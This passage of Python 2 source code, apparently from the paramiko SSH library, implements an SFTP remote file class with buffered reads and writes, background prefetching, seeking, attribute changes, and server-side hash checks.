            self._prefetch_data[self._realpos + size] = prefetch[size:]
            prefetch = prefetch[:size]
        return prefetch

    def _read(self, size):
        # Read up to MAX_REQUEST_SIZE bytes from the current position,
        # preferring prefetched data when available.
        size = min(size, self.MAX_REQUEST_SIZE)
        if self._prefetching:
            data = self._read_prefetch(size)
            if data is not None:
                return data
        t, msg = self.sftp._request(CMD_READ, self.handle, long(self._realpos), int(size))
        if t != CMD_DATA:
            raise SFTPError('Expected data')
        return msg.get_string()

    def _write(self, data):
        # may write less than requested if it would exceed max packet size
        chunk = min(len(data), self.MAX_REQUEST_SIZE)
        self._reqs.append(self.sftp._async_request(type(None), CMD_WRITE, self.handle, long(self._realpos), str(data[:chunk])))
        # When not pipelined (or when the server has queued responses),
        # drain all outstanding write acknowledgements.
        if not self.pipelined or (len(self._reqs) > 100 and self.sftp.sock.recv_ready()):
            while len(self._reqs):
                req = self._reqs.popleft()
                t, msg = self.sftp._read_response(req)
                if t != CMD_STATUS:
                    raise SFTPError('Expected status')
                # convert_status already called
        return chunk

    def settimeout(self, timeout):
        """
        Set a timeout on read/write operations on the underlying socket or
        ssh L{Channel}.

        @see: L{Channel.settimeout}

        @param timeout: seconds to wait for a pending read/write operation
            before raising C{socket.timeout}, or C{None} for no timeout
        @type timeout: float
        """
        self.sftp.sock.settimeout(timeout)

    def gettimeout(self):
        """
        Returns the timeout in seconds (as a float) associated with the socket
        or ssh L{Channel} used for this file.

        @see: L{Channel.gettimeout}

        @rtype: float
        """
        return self.sftp.sock.gettimeout()

    def setblocking(self, blocking):
        """
        Set blocking or non-blocking mode on the underiying socket or ssh
        L{Channel}.

        @see: L{Channel.setblocking}

        @param blocking: 0 to set non-blocking mode; non-0 to set blocking
            mode.
        @type blocking: int
        """
        self.sftp.sock.setblocking(blocking)

    def seek(self, offset, whence=0):
        # Flush buffered writes, move both logical and real positions, and
        # discard the read buffer (it no longer matches the new position).
        self.flush()
        if whence == self.SEEK_SET:
            self._realpos = self._pos = offset
        elif whence == self.SEEK_CUR:
            self._pos += offset
            self._realpos = self._pos
        else:
            self._realpos = self._pos = self._get_size() + offset
        self._rbuffer = ''

    def stat(self):
        """
        Retrieve information about this file from the remote system. This is
        exactly like L{SFTP.stat}, except that it operates on an already-open
        file.

        @return: an object containing attributes about this file.
        @rtype: SFTPAttributes
        """
        t, msg = self.sftp._request(CMD_FSTAT, self.handle)
        if t != CMD_ATTRS:
            raise SFTPError('Expected attributes')
        return SFTPAttributes._from_msg(msg)

    def chmod(self, mode):
        """
        Change the mode (permissions) of this file. The permissions are
        unix-style and identical to those used by python's C{os.chmod}
        function.

        @param mode: new permissions
        @type mode: int
        """
        self.sftp._log(DEBUG, 'chmod(%s, %r)' % (hexlify(self.handle), mode))
        attr = SFTPAttributes()
        attr.st_mode = mode
        self.sftp._request(CMD_FSETSTAT, self.handle, attr)

    def chown(self, uid, gid):
        """
        Change the owner (C{uid}) and group (C{gid}) of this file. As with
        python's C{os.chown} function, you must pass both arguments, so if you
        only want to change one, use L{stat} first to retrieve the current
        owner and group.

        @param uid: new owner's uid
        @type uid: int
        @param gid: new group id
        @type gid: int
        """
        self.sftp._log(DEBUG, 'chown(%s, %r, %r)' % (hexlify(self.handle), uid, gid))
        attr = SFTPAttributes()
        attr.st_uid, attr.st_gid = uid, gid
        self.sftp._request(CMD_FSETSTAT, self.handle, attr)

    def utime(self, times):
        """
        Set the access and modified times of this file. If
        C{times} is C{None}, then the file's access and modified times are set
        to the current time. Otherwise, C{times} must be a 2-tuple of numbers,
        of the form C{(atime, mtime)}, which is used to set the access and
        modified times, respectively. This bizarre API is mimicked from python
        for the sake of consistency -- I apologize.

        @param times: C{None} or a tuple of (access time, modified time) in
            standard internet epoch time (seconds since 01 January 1970 GMT)
        @type times: tuple(int)
        """
        if times is None:
            times = (time.time(), time.time())
        self.sftp._log(DEBUG, 'utime(%s, %r)' % (hexlify(self.handle), times))
        attr = SFTPAttributes()
        attr.st_atime, attr.st_mtime = times
        self.sftp._request(CMD_FSETSTAT, self.handle, attr)

    def truncate(self, size):
        """
        Change the size of this file. This usually extends
        or shrinks the size of the file, just like the C{truncate()} method on
        python file objects.

        @param size: the new size of the file
        @type size: int or long
        """
        self.sftp._log(DEBUG, 'truncate(%s, %r)' % (hexlify(self.handle), size))
        attr = SFTPAttributes()
        attr.st_size = size
        self.sftp._request(CMD_FSETSTAT, self.handle, attr)

    def check(self, hash_algorithm, offset=0, length=0, block_size=0):
        """
        Ask the server for a hash of a section of this file. This can be used
        to verify a successful upload or download, or for various rsync-like
        operations.

        The file is hashed from C{offset}, for C{length} bytes. If C{length}
        is 0, the remainder of the file is hashed. Thus, if both C{offset}
        and C{length} are zero, the entire file is hashed.

        Normally, C{block_size} will be 0 (the default), and this method will
        return a byte string representing the requested hash (for example, a
        string of length 16 for MD5, or 20 for SHA-1). If a non-zero
        C{block_size} is given, each chunk of the file (from C{offset} to
        C{offset + length}) of C{block_size} bytes is computed as a separate
        hash. The hash results are all concatenated and returned as a single
        string.

        For example, C{check('sha1', 0, 1024, 512)} will return a string of
        length 40. The first 20 bytes will be the SHA-1 of the first 512 bytes
        of the file, and the last 20 bytes will be the SHA-1 of the next 512
        bytes.

        @param hash_algorithm: the name of the hash algorithm to use (normally
            C{"sha1"} or C{"md5"})
        @type hash_algorithm: str
        @param offset: offset into the file to begin hashing (0 means to start
            from the beginning)
        @type offset: int or long
        @param length: number of bytes to hash (0 means continue to the end of
            the file)
        @type length: int or long
        @param block_size: number of bytes to hash per result (must not be less
            than 256; 0 means to compute only one hash of the entire segment)
        @type block_size: int
        @return: string of bytes representing the hash of each block,
            concatenated together
        @rtype: str

        @note: Many (most?) servers don't support this extension yet.

        @raise IOError: if the server doesn't support the "check-file"
            extension, or possibly doesn't support the hash algorithm
            requested

        @since: 1.4
        """
        t, msg = self.sftp._request(CMD_EXTENDED, 'check-file', self.handle,
                                    hash_algorithm, long(offset), long(length), block_size)
        # Extension name and algorithm echoed back by the server (unused).
        ext = msg.get_string()
        alg = msg.get_string()
        data = msg.get_remainder()
        return data

    def set_pipelined(self, pipelined=True):
        """
        Turn on/off the pipelining of write operations to this file. When
        pipelining is on, paramiko won't wait for the server response after
        each write operation. Instead, they're collected as they come in.
        At the first non-write operation (including L{close}), all remaining
        server responses are collected. This means that if there was an error
        with one of your later writes, an exception might be thrown from
        within L{close} instead of L{write}.

        By default, files are I{not} pipelined.

        @param pipelined: C{True} if pipelining should be turned on for this
            file; C{False} otherwise
        @type pipelined: bool

        @since: 1.5
        """
        self.pipelined = pipelined

    def prefetch(self):
        """
        Pre-fetch the remaining contents of this file in anticipation of
        future L{read} calls. If reading the entire file, pre-fetching can
        dramatically improve the download speed by avoiding roundtrip latency.
        The file's contents are incrementally buffered in a background thread.

        The prefetched data is stored in a buffer until read via the L{read}
        method. Once data has been read, it's removed from the buffer. The
        data may be read in a random order (using L{seek}); chunks of the
        buffer that haven't been read will continue to be buffered.

        @since: 1.5.1
        """
        size = self.stat().st_size
        # queue up async reads for the rest of the file
        chunks = []
        n = self._realpos
        while n < size:
            chunk = min(self.MAX_REQUEST_SIZE, size - n)
            chunks.append((n, chunk))
            n += chunk
        if len(chunks) > 0:
            self._start_prefetch(chunks)

    def readv(self, chunks):
        """
        Read a set of blocks from the file by (offset, length). This is more
        efficient than doing a series of L{seek} and L{read} calls, since the
        prefetch machinery is used to retrieve all the requested blocks at
        once.

        @param chunks: a list of (offset, length) tuples indicating which
            sections of the file to read
        @type chunks: list(tuple(long, int))
        @return: a list of blocks read, in the same order as in C{chunks}
        @rtype: list(str)

        @since: 1.5.4
        """
        self.sftp._log(DEBUG, 'readv(%s, %r)' % (hexlify(self.handle), chunks))

        read_chunks = []
        for offset, size in chunks:
            # don't fetch data that's already in the prefetch buffer
            if self._data_in_prefetch_buffers(offset) or self._data_in_prefetch_requests(offset, size):
                continue

            # break up anything larger than the max read size
            while size > 0:
                chunk_size = min(size, self.MAX_REQUEST_SIZE)
                read_chunks.append((offset, chunk_size))
                offset += chunk_size
                size -= chunk_size

        self._start_prefetch(read_chunks)
        # now we can just devolve to a bunch of read()s :)
        for x in chunks:
            self.seek(x[0])
            yield self.read(x[1])

    ###  internals...

    def _get_size(self):
        # Best-effort size lookup; 0 when the server can't be asked.
        try:
            return self.stat().st_size
        except:
            return 0

    def _start_prefetch(self, chunks):
        # Issue the async read requests from a daemon thread so a long queue
        # of requests can't block the caller.
        self._prefetching = True
        self._prefetch_done = False
        self._prefetch_reads.extend(chunks)

        t = threading.Thread(target=self._prefetch_thread, args=(chunks,))
        t.setDaemon(True)
        t.start()

    def _prefetch_thread(self, chunks):
        # do these read requests in a temporary thread because there may be
        # a lot of them, so it may block.
        for offset, length in chunks:
            self.sftp._async_request(self, CMD_READ, self.handle, long(offset), int(length))

    def _async_response(self, t, msg):
        # Callback invoked by the SFTP client when a response arrives for one
        # of our async read requests.
        if t == CMD_STATUS:
            # save exception and re-raise it on next file operation
            try:
                self.sftp._convert_status(msg)
            except Exception, x:
                self._saved_exception = x
            return
        if t != CMD_DATA:
            raise SFTPError('Expected data')
        data = msg.get_string()
        # NOTE(review): responses are matched to requests purely by arrival
        # order (pop(0) of the pending list) -- assumes the server replies
        # in request order.
        offset, length = self._prefetch_reads.pop(0)
        self._prefetch_data[offset] = data
        if len(self._prefetch_reads) == 0:
            self._prefetch_done = True

    def _check_exception(self):
        "if there's a saved exception, raise & clear it"
        if self._saved_exception is not None:
            x = self._saved_exception
            self._saved_exception = None
            raise x

    def __enter__(self):
        # Context-manager support: the file itself is the managed resource.
        return self

    def __exit__(self, type, value, traceback):
        self.close()
|
Subsets and Splits
No community queries yet.
The top public SQL queries from the community will appear here once available.